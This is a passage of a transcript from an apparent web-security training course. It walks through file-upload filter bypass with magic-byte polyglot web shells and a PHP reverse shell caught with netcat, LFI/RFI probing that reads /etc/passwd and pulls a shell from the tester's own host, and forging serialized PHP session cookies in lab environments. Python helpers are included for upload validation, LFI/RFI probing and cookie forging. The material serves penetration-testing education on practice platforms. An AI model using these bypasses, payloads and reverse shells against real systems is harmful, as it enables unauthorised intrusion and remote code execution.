come to update this, and we want to update this image again, and we upload it, and now we turn our intercept on and we submit this, we can look at the difference, and we'll send this to Repeater just to save it, and we know that this is going to go through; it tells us that it worked. Now we'll come back and upload our PHP shell and see what the difference is. So we can come over, we'll try our web shell this time, and turn on our intercept, send it, we'll send that to Repeater and we can turn this off now, and we can come over to Repeater and look at these and see what the difference is. So when you come over here and you look at this, right here's what we're looking at: so we have a Content-Type of image/png, the file name, which was the link that we downloaded, and then it tells us it's a PNG file, and we have all this mumbo jumbo right here. And so what we can do is just copy some of this, and now we can come over here and we have a file type of web.php and then we have our little web shell that we used before, and we could just paste this in up above. And so our Content-Type has now changed, and we have these bytes to try and confuse it, and then we have our web shell right here.

So I want to show you a little bit of how a server would read this file type. If we come in here and we just say gedit, and we want to make a file, we'll make a file.gif, and we'll see what happens. And we'll just put in some letters and we save this, we close it, and we go file and then we say file.gif, and it tells us that it is actually text. So if we then come into our file.gif, there is something called magic bytes that we can add in here to try and trick it. The way a GIF starts is with GIF89a or GIF87a, and if we save something like this and run file on it, now it tells us we have a GIF, an image type, and the version. So this is how a server would read this: if you upload something, it's going to run something like file on it to see if it really is a GIF or if it just has text in it. And so when we copy all of this right here with the PNG, basically what we're trying to do is trick it by putting something in like this GIF87a, so that when it reads it, it will read it as a PNG. And we'll actually try this GIF, because I've never actually tried it on this box, so I don't know if it will work or not, and we'll just try the file upload on the fly. So if we send this over, it tells us that it looks like it uploaded; we can see it looks like it did upload. So I'm kind of surprised that worked; we'll go check it out. So if we come over to our uploads, we refresh the page and we open this up, it looks like it worked. We should be able to pass in our parameter of cmd= and we can say whoami, and it tells us right here www-data. So that actually worked; I was expecting it to not work. And sometimes when you hit a file like this and it does not work, it might check for just a .png inside the file, .png and then the .php. And if you just go out to Google and you read about different ways to bypass filters for file upload, you're going to have a lot of information, and that's really what I would recommend you to do. This is just the tip of the iceberg on how file upload works, so I'm just showing you some basic ways to bypass it, but I would also recommend going out to Google and reading about how to bypass a PNG file upload filter or a JPEG, and see all the different ways you can bypass this.

So if we come in here and we send this and it renders, it tells us this worked as well, so we can actually go back and if we refresh this right here, it tells us that this worked. So there's one other thing, let's play around with the JPEG. So if we come in here and we close out of this, let's actually just play with it in Repeater and see what happens. So if we say it's an image, and we say... actually, let's try the GIF because we already have that set up, and we just leave this like this and we delete all of this, and we just type in the 87a with GIF at the front; let's see if this works. It says invalid file. So let's take our PHP shell, we'll copy this, and let's see if we can just say, let's gedit this file and we'll call it file.php, and we'll add in the GIF87a and then we'll put our PHP in here and we'll save this. And then we're also going to need our GIF file, so we have that in there too, so that way we can make sure that our Content-Type right here is right. So go to Proxy so that way it is ready, we can try this upload, browse, let's upload the file with the GIF, we'll open, make sure that we catch this, send it to Repeater. It looks like that is how it goes; I actually want to turn this off. It says that it worked, okay, so it does accept the GIF as well. Now let's upload our reverse shell that we saved in file.php, and we'll send this on over to Repeater. See how we have this application type that is different. So we can turn this off and see if we can get this to work as well. So we'll send this and it says invalid file, and when we send this it says that it worked. So what we can try and do is just grab this like we did before, we'll copy it and paste this in, should be able to delete this. Does that actually have a semicolon in it? It does, so it should work like that. If we send it, it says that it worked. So let's go see if we can find that. Here's the GIF; says it didn't work. That's not surprising, because it's not actually an image; we need our other PHP shell. Here's our GIF with our PHP in it, so let's try and pass in the same parameter, cmd=whoami, and if we send this, it tells us this GIF works, and it cannot execute the command within the file. Let's try and just delete this and see if we can get a whoami this way. Whoa. Send that, come back, refresh, check out this PHP, and it tells us we're www-data. So it does let us inject a command with a GIF, but for some reason I wasn't able to get the web shell to work. But there's another way to go about this. So this would be a really roundabout way to do this: you could come in and we could try and upload like a Python shell in here, or because we know we have PHP, we could put inside of our command right here, instead of doing a system whoami, we could come to this web shell and we could execute a PHP reverse shell like this. But you saw us use this recently; let's just try and upload this PHP shell and see if we can get this to execute a reverse shell for us. So we'll come back over here, we can edit this again, we'll put in our PHP reverse shell, we can open, we'll need to catch this inside Repeater, turn our intercept on, submit, and send over to Repeater, we can turn this off, come to Repeater. Tells us we have an invalid file, which we expect. We have the shell.php and we'll just use the one with the PNG because we know that it's going to work for us, so we can come over here and we can just highlight this, paste in the PNG, now if we send this it tells us that this worked. We can set up a netcat listener over here, netcat, and I think we originally made that on port 44444, and now that's listening. So now when we open up that file it should execute on the server and it will give us a shell back. We can see our PHP file, we can see the size has changed, so we open this up and it's hanging, and we have a shell returned back to us, and it's going to tell us I am www-data. So that is file upload.
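Since the Popcorn walkthrough above works by renaming to .php5, rewriting the Content-Type header, and prefixing GIF87a magic bytes, here is what an upload validator has to do to hold up against each of those, as an added Python example that is not code from the course or from Hack The Box. The file names, Content-Type values and byte strings are constructed to mirror the attempts above; a `<?php` comment stands in for the web shell, and nothing is written to disk.

```python
import re
import secrets
from typing import List, NamedTuple, Optional

# Magic bytes for the only image types this endpoint accepts.  The `file`
# command shown above keys off the same leading bytes.
MAGIC = {
    "png":  [b"\x89PNG\r\n\x1a\n"],
    "gif":  [b"GIF87a", b"GIF89a"],
    "jpg":  [b"\xff\xd8\xff"],
    "jpeg": [b"\xff\xd8\xff"],
}
# A PHP open tag anywhere in the body: catches GIF87a<?php ... polyglots.
PHP_TAG_RE = re.compile(rb"<\?(php\b|=)", re.IGNORECASE)


class Verdict(NamedTuple):
    accepted: bool
    reason: str
    stored_name: Optional[str]


def validate_upload(filename: str, content_type: str, data: bytes) -> Verdict:
    """Decide whether an upload may be stored; each step answers one of the
    bypasses tried above, and the order matters."""
    # 1. Extension: the LAST suffix, lower-cased, against the allow-list.
    #    shell.php5, shell.php and web.php fail here whatever the
    #    Content-Type header or the bytes in front of the payload say.
    m = re.search(r"\.([A-Za-z0-9]+)$", filename)
    ext = m.group(1).lower() if m else ""
    if ext not in MAGIC:
        return Verdict(False, "extension not allowed", None)
    # 2. Content-Type is attacker-controlled (it was rewritten in Repeater),
    #    so this is a cheap early reject, never the security decision.
    if not content_type.lower().startswith("image/"):
        return Verdict(False, "content-type not image/*", None)
    # 3. Magic bytes must match the CLAIMED type, not just any image type.
    if not any(data.startswith(sig) for sig in MAGIC[ext]):
        return Verdict(False, "magic bytes do not match extension", None)
    # 4. Polyglot check: a valid image header followed by PHP source.
    if PHP_TAG_RE.search(data):
        return Verdict(False, "embedded PHP tag", None)
    # 5. Never keep the client's name: random name + the verified extension,
    #    so whatever was uploaded is served as an image and nothing else.
    return Verdict(True, "ok", f"{secrets.token_hex(8)}.{ext}")


# Constructed upload bodies modelled on the Popcorn attempts above.
PNG_SIG = MAGIC["png"][0]
PHP_STUB = b"<?php /* constructed stand-in for a web shell */ ?>"
SAMPLE_UPLOADS = [
    ("screenshot.png", "image/png",                PNG_SIG + b"constructed image body"),
    ("shell.php5",     "application/octet-stream", PHP_STUB),
    ("web.php",        "image/png",                PNG_SIG + PHP_STUB),
    ("file.gif",       "image/gif",                b"GIF87a" + PHP_STUB),
    ("shell.php.png",  "image/png",                PNG_SIG + b"constructed image body"),
    ("photo.gif",      "image/gif",                PNG_SIG + b"constructed image body"),
]


def run_samples() -> List[Verdict]:
    return [validate_upload(*u) for u in SAMPLE_UPLOADS]


if __name__ == "__main__":
    for (name, ctype, _), v in zip(SAMPLE_UPLOADS, run_samples()):
        print(f"{name:15} {ctype:26} -> {v.reason} {v.stored_name or ''}")
```

The point the samples make is that the decision has to rest on the stored extension, not on the header or the leading bytes: web.php with a perfect PNG header and image/png Content-Type is still refused, while shell.php.png is accepted only because it is stored under a random name ending in .png, so the server will never execute it. The GIF87a plus PHP polyglot that worked on the box is caught twice, once by the extension and, if it arrives as file.gif, by the embedded tag check.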
different ways you can play with this if you have hack the box I would recommend coming into popcorn because you have a lot of different ways to play with this you have the JPEG and the GIF the PNG and so you can just come in here and play around with these and see all the different ways you can get a reverse shell from a file upload and I would recommend because we were not able to get the GIF web shell to work you could play around with that and see if you could get a web shell rather than just executing commands one at a time and then maybe see if you can get a reverse shell from the web shell because there will be times that you have to do that inside of ctfs but in the world of bug Bounty you really wouldn't be trying to get a reverse shelf you could just simply do a web shell into who am I for a proof of concept and file uploads are something you're going to see so you can read about those in hack the box and I would definitely recommend going out to Google and continuing your research on file uploads but like I said there's really not a lot of places to practice file upload and it's because if there's a file upload that is going to be vulnerable on a server you can get remote code execution and for this reason hack the box is really the only place that is really good for file upload try hack me has a little bit of file upload but I don't think it's as good as hack the box when it comes to practicing this specific vulnerability try hack means really great in other areas but hack the box is really good for file upload so with that I will see you in the next vulnerability okay welcome to the local file inclusion and the remote file inclusion also known as lfi and RFI portion of this course the lfi is going to be one that is more common than the RFI and the lfi is going to give us the opportunity or the ability to read local files on the server which could lead to a compromise of sensitive information or data that we're not supposed to be able to access and 
files on the server that we should not be able to access now RFI is going to give us the ability to host up our own files and then have the server reach out to our server that we make on our Cali machine and then execute that file and will lead to remote code execution on the server so we're going to jump into the lfi and the RFI now let's get started welcome to the lfi RFI so the local file inclusion or the remote file inclusion a portion of this course we're going to be using try hack me for our example and and try hack me is just too good to pass up when it comes to practicing lfi and RFI if you can afford a try hack me membership then it is worth it just to come in here and practice your lfi and RFI along with other things and when it comes to hack the Box hack the Box doesn't have any really good place to practice and RFI so sadly you're not if you have only a hack a box membership you're not going to be able to practice this so what we have going on right here this is a really great explanation I'm really happy with how they have this all structured so you have your basic web application right here you have the HTTP the URL and then you have a get dot PHP and this PHP right here is going to be a giveaway of the way we're going to go about trying to pull this file down so oftentimes you're not going to see a DOT PHP but sometimes you will and when you see a DOT PHP and then a file equals just like this you can think you can try for an lfi and we've already talked about directory traversal and typically if something is vulnerable to a directory traversal you are going to be able to pull down files as well and once you have lfi which is pretty bad if you can turn that into remote file inclusion then you have got something really really big going on for you so we have this URL that's going to make a get request to the server for a specific file and it's going to equal the file that you click on and I'm going to show this to you and I think it will make a lot more 
sense so I've already opened up the lab here when we click on lab1 it tells us it's got this lab1.php and you can come in here and you can just type something in so if we just type in anything because we don't really want to look for a file just yet actually I'll just show you this way so if we come in here and we type in Etsy pass WD and we say include it pulls it down for us but this is not this is not going to happen that's not real world so what will happen is something like this you'll come to a page it'll have like this request right here you're searching for something and say it's a search bar and we just type something in and we intercept this in our proxy and we hit include we'll send this to our repeater we can turn this off and now what happens is it tells us we'll just pretend all this isn't here because this is not going to happen in the real world but this will happen right here this file equals and then what we typed in now this looks like what we had going on over here and this really does happen and up here we can change this and we can now put in this Etsy pass WD and it will pull it down like this and a lot of times you'll have this file equals up here and you can play around with it but rather than using the URL I would rather use burp so we can come over here and we can say send and I like that it tells us we have this nginx server right here and I'm sure if we ran like an nmap scan it would tell us what we're up against completely but we're not going to do that we'll do that in just a minute with an lfi on a hack the Box system and we will test it there but we have this file equals and then we have right here where we can ask whatever file we can ask for whatever file we want so right here we can put in our Etsy pass WD and we can send this and on the page it tells us we have users here and when you're looking for users you can look for the bin Bash that's going to tell us people who have actual users on this box there's actually quite a few 
of them or a bin sh not a bin bash we have root has it been bash so when you pull this down you can look for users and it's even worse if you can access the Etsy Shadow file because then we can actually pull down password hashes and we don't have the ability to do that so this would be a file inclusion and you can pull down all kinds of files from the server so you can actually pull down let's say we wanted to look at the index.php you can send this and it'll pull down I can't tell if that worked or not um because there's just a bunch of HTML let's render it maybe we can see it yeah so it just pulled down the home page like right here so you can look at different pages in here so let's say you were able to director you were to do some kind of fuzzing on this page and you were looking for different directories and you had a directory that you weren't allowed to look at like a hidden directory in here you could probably include this in the file and it will pull down that hidden page below right here and because we're able to do this local file inclusion when you have local file inclusion it's a great vulnerability to find it's one that it's a pretty severe vulnerability but if you can turn this into a remote file inclusion then it becomes something more so right now we have what's called local file inclusion we're able to get local files that are hosted on the target server but if you're able to have remote file inclusion that means we can include files from our box over here so if you look at what we have in this file we have a shell.php right here and a web shell over here if I have remote file inclusion I can I can have this get request reach out to my server over here that I can host up and I can host up this file right here and it will go get that file and then execute it and then I can have remote code execution on this server and I will own this network so what this looks like an easy way to test for this like if you were to do this in a bug Bounty program and 
you were just looking for a proof of concept you would just type in sudo python 2 with a simple server and then we would just put in our IP address and see if it reaches out to us so we can go HTTP 10 to 42 96. and we can send this and see if we get a hit over here and we do so this is so this means we can actually get remote code execution on This Server so what we can do now is close out of this we'll re-host up those files and I've already edited and I've already edited the shell.php so you wouldn't have to watch me change the IP address right here so it's all set up and ready so we can host this backup we can come over here and say netcat Port 444 and if we send this right here we want it to grab shell.php and now if we send this it's going to hang right here because we have a shell and we could say who am I and it now tells us we are www data so we now have code execution on this server and this would be pretty much as bad as it gets now I want to show you a little more local file inclusion and how to read pages when they don't render over here when we ask for a specific file and we want to see what's happening and I'm going to switch over to hack the box for this all right I have loaded up the box poison here for us and if you have a hack the box subscription it would definitely be worth your time to open this up and play around with it so you can see if you're able to find any of these lfi files on your own so we're going to go ahead and just play around with this for a little bit and I want to show you some of the things you can do with lfis that can really save you a lot of time and if you're doing ctfs help you find files that are that you shouldn't be able to access so we're going to do the same thing we did before we'll just put in some characters in here and we're going to catch this over in our repeater so we'll hit submit we'll send this over to repeater and then we can turn this our Interceptor off and now you can see before we didn't have this file 
right here with the browse.php and then the file and then our request. So you can, like I showed earlier, try and get files right here like this, which is fine, but I like to use Repeater just because it goes a lot faster, so we're going to go ahead and use Repeater. We'll hop over here, and if we send this we get this simple message over here saying that it failed to find this through the inclusion, and it tells us the path we're using right here. So what we can do at this point is we can try and type in /etc/passwd, and if we send this we can see we have the /etc/passwd file right here, and it's something to always look through. The server version: you can highlight it, copy it, go to Google, see if there are any vulnerabilities, and check that type of stuff out, especially when you're hunting for bug bounties as well as penetration tests; it's always worth looking at. And then we can see the users on here: it's going to be this one right here, and then we have root right here as a user; the rest of these don't look like they have the ability to log in.

Now on to looking for more files. There's a really simple way to go through the files really quickly, and I've used the tool ffuf a lot on my channel, so we're going to go ahead and use ffuf. I'm just going to leave this in here and delete this a little bit at a time; actually, we'll just delete this whole thing. What we'll need to do is highlight this and copy it, paste it into ffuf, and then right here we're going to want to fuzz, but to make sure we make it all the way back to the root I'm going to just put some of these ../ in here so that we can make sure we go all the way back to the root, and then we're going to fuzz. We don't want to fuzz this with the web content; what we want to look for is the LFI content, so we can come back over here, and I think we just type in web... nope, we don't want web
shells, we want Fuzzing right here, so we can type in Fuzzing, and then we want LFI, which is right here. So we're going to go into that directory and see what's in here, and we'll use this one because we're up against a Linux box; we can just type in Linux. That did not work for me; we'll type it in like that, and now if we run this it should work for us, and it does. But we don't want all of that output, so we're going to filter by lines, and we're going to say if it has five lines don't include it, and it's going to give us all the files that we're able to look at. Now if I was actually doing a CTF I would look through every single one of these to see what we can find. Now obviously we tried the /etc/passwd, but you can come through and check out all of these files and see if there's anything helpful for you to try and get remote code execution on the box. And because we don't have an RFI, which I have not actually tried, we'll go ahead and try it and make sure that this does not work, and we can put my IP address in here, which is 10.10.14.6.
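As an added example (this is not code from the video or from the box), here is the LFI and RFI probing from the last few minutes written out in Python so the logic is explicit. Everything runs offline: FAKE_FS and vulnerable_include() are a constructed stand-in for a browse.php that does include($_GET['file']) with no validation, the webroot and the file contents are invented, the target URL in the usage line is illustrative, and the SecLists wordlist path in ffuf_command() is an assumption about where SecLists is installed. The probe walks ../ depths until a known /etc/passwd marker shows up in the response body, and the RFI check only counts as positive when the "server" actually reaches out to the attacker URL, which is the same callback logic as the SimpleHTTPServer trick above.

```python
"""LFI/RFI probing helpers. Added example, not from the course.

FAKE_FS / vulnerable_include() are a constructed stand-in for a PHP page that
does include($_GET['file']) with no validation, so the probing logic can be run
without a target. Swap `fetch` for a real requests.get() wrapper on a lab box.
"""
import posixpath
from typing import Callable, Iterator, Optional

WEBROOT = "/usr/local/www/apache24/data"          # invented document root
FAKE_FS = {                                        # constructed files
    "/etc/passwd": "root:x:0:0:root:/root:/bin/sh\n"
                   "www:x:80:80:WWW owner:/nonexistent:/usr/sbin/nologin\n",
    WEBROOT + "/browse.php": '<?php include($_GET["file"]); ?>',
}
OUTBOUND = []   # URLs the fake server tried to fetch (stands in for your listener log)


def vulnerable_include(file_param: str) -> str:
    """Model of include($_GET['file']) with allow_url_include=On and no checks."""
    if file_param.startswith(("http://", "https://")):
        OUTBOUND.append(file_param)               # the server phones home: RFI
        return ""
    path = file_param if file_param.startswith("/") else posixpath.join(WEBROOT, file_param)
    path = posixpath.normpath(path)               # ../ is resolved like the OS would
    return FAKE_FS.get(path, "Warning: include(%s): failed to open stream" % path)


# A real file was rendered only if a known marker shows up in the body.
MARKERS = {"linux": "root:x:0:0", "windows": "[boot loader]"}


def traversal_payloads(filename: str, max_depth: int = 8) -> Iterator[str]:
    """../ chains of increasing depth, then a bare absolute path as a last try."""
    target = filename.lstrip("/")
    for depth in range(1, max_depth + 1):
        yield "../" * depth + target
    yield "/" + target


def find_lfi(fetch: Callable[[str], str], filename: str = "etc/passwd") -> Optional[str]:
    """Return the first payload whose response contains a file marker, else None."""
    for payload in traversal_payloads(filename):
        body = fetch(payload)
        if any(marker in body for marker in MARKERS.values()):
            return payload
    return None


def check_rfi(fetch: Callable[[str], str],
              attacker_url: str = "http://10.10.14.6/shell.php") -> bool:
    """RFI is confirmed by a hit on your own listener, not by the response body."""
    hits_before = len(OUTBOUND)
    fetch(attacker_url)
    return len(OUTBOUND) > hits_before


def ffuf_command(base_url: str, depth: int,
                 wordlist: str = "/usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt") -> str:
    """The ffuf line used in the video: fixed ../ prefix, -fl 5 drops the 5-line error page.
    The wordlist path is an assumption about where SecLists lives on your machine."""
    return "ffuf -u '%s%sFUZZ' -w %s -fl 5" % (base_url, "../" * depth, wordlist)


if __name__ == "__main__":
    print("LFI payload:", find_lfi(vulnerable_include))
    print("RFI:", check_rfi(vulnerable_include))
    print(ffuf_command("http://10.10.10.84/browse.php?file=", 6))
```

On a real target, the thing to keep from this is the marker check: a 200 with an error page still looks like a hit to a fuzzer, so filter on body content (or on line count, as -fl 5 does here), and treat an RFI as confirmed only when your listener logs the inbound request.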
And it doesn't hang: no RFI, so we aren't able to include any of our own files to get a shell back that way, but you could look through all of these and see if maybe you can find some credentials or something, or maybe be able to SSH into the box. But this is a quick, easy way to fuzz when you have an LFI. In a real bug bounty situation you wouldn't want to actually enumerate any of this; you would only do something like that on a CTF. You would really just test for an LFI like I've already shown you and make sure that it is there, and then you would submit a report. Or if you were testing for an RFI, you would just do what we did right here and set up a simple server and see if you can reach out to yourself. So that is the remote file inclusion and the local file inclusion. You can go ahead and play with these if you have a TryHackMe and a Hack The Box subscription and get used to seeing these; you're going to see them a lot inside of CTFs, especially LFIs. RFIs are a lot more rare, but they do happen. So with that we will move on to the next vulnerability.

All right, we are going to be going over some insecure deserialization, and I decided to make a little flowchart here so that you could kind of see what is going to be happening. This is for PHP, but the concept is going to be the same for Python and JavaScript as well; the examples we're going to be dealing with are PHP, though, so I decided just to show you PHP. It'll make it a lot easier for you as we continue going. We're going to have just a few places to practice; this is something that there are not actually a lot of places to practice, so I wanted to show you here, and then I think I'm going to show you an example, and then you should be able to solve a few challenges on your own, and if not, we will walk through them together. I think you'll get the hang of this pretty quick; it's not super difficult, but it is something that a lot of people are afraid of. But nonetheless, let's jump into it. So we have what's
going to be the waiter, and he is the object. This would be like... inside of programming there's something called object-oriented programming, and I don't want to get too much into it, but just know that this is the object, and the object can contain different things inside of it. So you have the waiter and he carries a plate, and so with the waiter the question would be: does the waiter have a plate? And it's true or false; this would be a Boolean, and within PHP it's represented as just a b, and then it'll say b equals and it'll be a one or a zero, so that'll be either true or false. So does the waiter have a plate? It would say true, and so in this case it would say "waiter has a plate", b equals one, and so you'd say here the waiter has a plate. And then if he has the plate we come down here and it says, what is on the plate? Well, on the plate there may be a username, and the username, when you see these quotation marks like this, is stored as a string. So the username is a string, and so within an object you would see something like s, username, and then it would have the name, and the s is going to stand for the string. And then you will have maybe the person that is being... maybe the object is going to contain an age, and so on the plate there's going to be more data, and it is going to be an age, and it's going to be 25, and it is an integer because it's a number, and so this would be represented as an i, so it'd be like i, age equals 25. It sounds confusing, but we're going to see what this looks like here in just a minute and it will all make sense, and I'll come back to this and show it to you once we look at the full picture of what this looks like inside of a cookie. So let's take just a step forward, just a little tiny step forward, and look at how you're going to go about exploiting this, and then we'll go ahead and exploit some of these insecure deserialized objects.

All right, so I have opened up a TryHackMe box here.
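The waiter flowchart above is describing PHP's serialize() format, and the cookies in the PortSwigger labs that come next are exactly that format, base64-encoded. As an added example (not code from the course, and not how the labs are meant to be solved; pure Python, no PHP required), here is a small parser and serializer for that format, plus the two cookie edits the labs ask for: flipping a b:0; flag to b:1;, and replacing a string token with an integer 0. The RAW object and the lab2 cookie in the test are constructed to look like the lab cookies; no real lab value is reused. The php7_loose_equals() helper is a simplified model of PHP 7's == operator and is the reason both the integer 0 and a bare b:1 get accepted in place of the token: in PHP 7 (before PHP 8 changed this), an integer compared to a non-numeric string casts the string to 0, and a boolean true compared to any non-empty string is true. Leading-numeric strings such as "12abc" are not modelled.

```python
"""PHP serialized objects, the format behind the waiter flowchart. Added example,
not from the course. Pure Python, no PHP needed. Sample data is constructed to
match the shape of the PortSwigger lab cookies (a User object with a flag).
ASCII-only: PHP string lengths are byte counts and this parser slices characters.
"""
import base64

RAW = 'O:4:"User":2:{s:8:"username";s:6:"wiener";s:5:"admin";b:0;}'   # constructed


def _parse(data: str, pos: int):
    """Recursive-descent parse of one value starting at data[pos]; returns (value, next_pos)."""
    kind = data[pos]
    if kind == "N":                                   # N;  null
        return None, pos + 2
    if kind in "ib":                                  # i:25;  b:1;
        end = data.index(";", pos)
        val = int(data[pos + 2:end])
        return (bool(val) if kind == "b" else val), end + 1
    if kind == "s":                                   # s:8:"username";
        colon = data.index(":", pos + 2)
        length = int(data[pos + 2:colon])
        start = colon + 2                             # skip :"
        return data[start:start + length], start + length + 2   # skip ";
    if kind in "aO":                                  # a:2:{...}  O:4:"User":2:{...}
        name = None
        if kind == "O":
            colon = data.index(":", pos + 2)
            name_len = int(data[pos + 2:colon])
            name = data[colon + 2:colon + 2 + name_len]
            pos = colon + 2 + name_len + 2            # skip ":
        else:
            pos += 2
        colon = data.index(":", pos)
        count = int(data[pos:colon])
        pos = colon + 2                               # skip :{
        items = {}
        for _ in range(count):
            key, pos = _parse(data, pos)
            val, pos = _parse(data, pos)
            items[key] = val
        if name is not None:                          # objects carry their class name
            items = {"__class__": name, **items}
        return items, pos + 1                         # skip }
    raise ValueError("unsupported type %r at offset %d" % (kind, pos))


def parse(data: str):
    value, end = _parse(data, 0)
    if end != len(data):
        raise ValueError("trailing data after offset %d" % end)
    return value


def serialize(value) -> str:
    """Inverse of parse(). bool is tested before int because bool subclasses int."""
    if value is None:
        return "N;"
    if isinstance(value, bool):
        return "b:%d;" % value
    if isinstance(value, int):
        return "i:%d;" % value
    if isinstance(value, str):
        return 's:%d:"%s";' % (len(value.encode()), value)   # PHP counts bytes
    if isinstance(value, dict):
        cls = value.get("__class__")
        items = [(k, v) for k, v in value.items() if k != "__class__"]
        body = "".join(serialize(k) + serialize(v) for k, v in items)
        if cls is None:
            return "a:%d:{%s}" % (len(items), body)
        return 'O:%d:"%s":%d:{%s}' % (len(cls), cls, len(items), body)
    raise TypeError("cannot serialize %r" % type(value))


def decode_cookie(cookie: str):
    return parse(base64.b64decode(cookie).decode())


def encode_cookie(obj) -> str:
    return base64.b64encode(serialize(obj).encode()).decode()


def forge(cookie: str, **changes) -> str:
    """Decode, overwrite the given properties, re-encode. Lengths are recomputed,
    which is the part that is easy to get wrong when editing the cookie by hand."""
    obj = decode_cookie(cookie)
    obj.update(changes)                               # e.g. admin=True or access_token=0
    return encode_cookie(obj)


def php7_loose_equals(a, b) -> bool:
    """Simplified PHP 7 (pre-8) == semantics for the cases that matter here:
    bool vs string casts the string to bool ("" and "0" are false);
    int vs non-numeric string casts the string to 0. Leading-numeric strings
    like "12abc" are not modelled."""
    if isinstance(a, bool) or isinstance(b, bool):
        if isinstance(a, str):
            a = a not in ("", "0")
        if isinstance(b, str):
            b = b not in ("", "0")
        return bool(a) == bool(b)
    if isinstance(a, int) and isinstance(b, str):
        try:
            return float(a) == float(b)
        except ValueError:
            return a == 0
    if isinstance(a, str) and isinstance(b, int):
        return php7_loose_equals(b, a)
    return a == b


if __name__ == "__main__":
    cookie = encode_cookie(parse(RAW))
    print(cookie)
    print(serialize(decode_cookie(forge(cookie, admin=True))))
    print(php7_loose_equals(0, "x7kd9"), php7_loose_equals(True, "x7kd9"))
```

The practical point: when you hand-edit one of these cookies in Repeater, every s:N: length has to match the new byte count and the property count after the class name has to match, or PHP's unserialize() fails and you get the same error over and over. Regenerating the string from a parsed structure avoids that.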
Sadly, it's not a real great example for an insecure deserialization vulnerability, because I already created a username with the name "name", my password is "name", and if we log in it brings us to this page. But in the real world, if you came to something like this and you just fuzzed this with a fuzzer like ffuf or gobuster or dirb, you would find this directory called admin, and bam, you're here and you're in the administrator dashboard, which is kind of a bummer because you're just automatically in here and it tells you, here's the flag, and you've made it inside of the dashboard. So what we can do from in here: I want to test this in here and then we'll go back to our user profile, and we can just inspect this like we normally would. We'll come over to the memory, which is where the cookie is going to be stored; sorry, not the memory, the storage, where the cookie is going to be. And it's going to say we have a password, our session ID, and our username and our user type, and in changing these cookies right here you can manipulate the user type and the username. Now inside of Burp this also wouldn't be in plain text like it is right here, but if we intercept this and we refresh this and we say forward, and we have our Interceptor on and we come to the my profile page again and we forward this right here and we send this to Repeater, you can get a look at this: here's a username, admin, password right here, this is what we changed, and we have this base64 cookie right here. Let's see if we can decode it; we can get some of it. But what you would do with this: usually it's not going to be in plain text, it would be base64, and you would have to decode it and then you can change these things right here. So with that I want to send you over to PortSwigger, and we're going to go to the insecure deserialization right here, and we're going to walk through some of these, and you're going to
get the hang of them pretty quick; they're not as challenging as you might think. So we're going to do this first one right here, and if you want, you can go ahead and give it a try and see if you can figure out how to pull this off, but I want to walk through this one right here, and then we're going to go back to the flowchart because I think it's going to make a lot more sense once we do. So you can go ahead and give this a try if you would like; load it up here. The instructions tell us that we need to use a serialization-based session mechanism and vulnerability, and we're going to try and exploit it, and it says here are our credentials to log in, and we need to delete Carlos's account in order to solve this challenge. So what we'll do is we can just come over here and we'll need to make an account; I'm going to call my account "name" and my password "name". I'm going to intercept this just in case we end up needing it, so we'll intercept this, we'll send it, I'm going to send this to Repeater; I don't believe we're going to need it though, so we'll leave that there. Come back over to our proxy... oh, we need to log in with the username that it gave us, so we have right here our username, and Peter, so we'll log in with this. And then it tells us we need to go to the admin panel; we need to use the session cookie to go to the administrator panel, or privileges, and delete Carlos. Okay, so what we can do here at this point is you're going to come to this my account, but we're going to need to intercept the request. It will look like this; you can send this to Repeater, forward, forward, we'll send this to... I don't think we need that one, but we'll turn that off, we'll come back one, send this and see what it looks like. And what we can do is, you might have this little Interceptor thing closed; open that up, we can highlight this and it'll decode this for us, and it's going to tell us, are we an admin? And if you remember, this is the object right here, so the object is called four
and it is a User, and then we have a string, which we have our username, and we have another string, which is our... well, right here is our username, and then it tells us we're an admin, which is also stored as a string, and then we have this right here, this Boolean: are we an admin? And it is set to false, but we can go ahead and change this to true. We can apply the changes; I'm going to highlight this cookie just in case this doesn't work. We can send it and it says okay, it worked. If we refresh the page, it didn't update our cookie for us, so we're going to have to manually come over here and update our cookie, and right here's the cookie; paste in the one we just made ourselves, and now if we refresh the page we should have access to an admin panel, and we do, right here, and you can delete Carlos if you would like this to say solved right here. The next one is going to be pretty similar and not really much more difficult than this. If you struggled: I struggled the first time with figuring out that I needed to actually copy the cookie and inspect and paste it in. That's okay; you're going to need to do that in the next one as well, but we can go ahead and hop over there and check that one out.

All right, so we're going to go ahead and do this second one right here, and what you will need to do is... I just opened it up in a new tab, and I also opened up the labs, that way we don't have to wait for that to load. So we'll read the instructions, and it tells us we're going to need to gain access to the administrator account and delete Carlos once again, and we have the same username and password. So if we come over here we're going to do the same thing we did before, and we will log in just like before, and now that this has logged us in, we'll come to our proxy, we're going to intercept the request, check out the my account page, send this to Repeater, come over here, send it, see what happens; we get a 200 OK, and now we're going to mess with this cookie once again, and you can see it looks like
there is a lot more going on in here than last time, but you can break it down just like before. We have our object, and then we have a string with our username right here, we have the username, and then it tells us we have this string right here with our access token in it, and then we have this going on right here. So what we would need to do with this at this point: this access token is obviously going to be bad for us, because it is going to be telling us what we can access and what we can't access, so if we just delete that and then we just put in here the b:1 to make this true, we can apply the changes. We can actually send this to make sure we don't get an error, and it says 200 OK, which means this token should work for us right here. And so I'm going to copy it out of the box just to make sure I don't get anything wrong, and now what we'll need to do is come back to our page. If we refresh this nothing happens, even though we sent it from Burp; we'll have to inspect and check out the cookie over here, change our cookie, and then refresh the page, and we have the admin panel. So this looks really easy, but this one actually took me, I would say, almost 15 minutes to figure out what exactly was going on inside of Repeater. I'm not real great with PHP, and so when I was trying to figure this out, I finally got this to go; I accidentally left this in a string the first time, which is something you may have done, and if you try and leave this inside of a string it is going to give you this error over and over and over again. That's one mistake that I made over and over as I was messing with this, and then the other mistake I made was I deleted this and applied changes, and if you send it you'll get the same error, and I forgot to delete this. So this is really finicky, and in the real world you're going to have to do pretty much what I did and just keep testing this over and over and over until you get a 200, and then you'll know that something
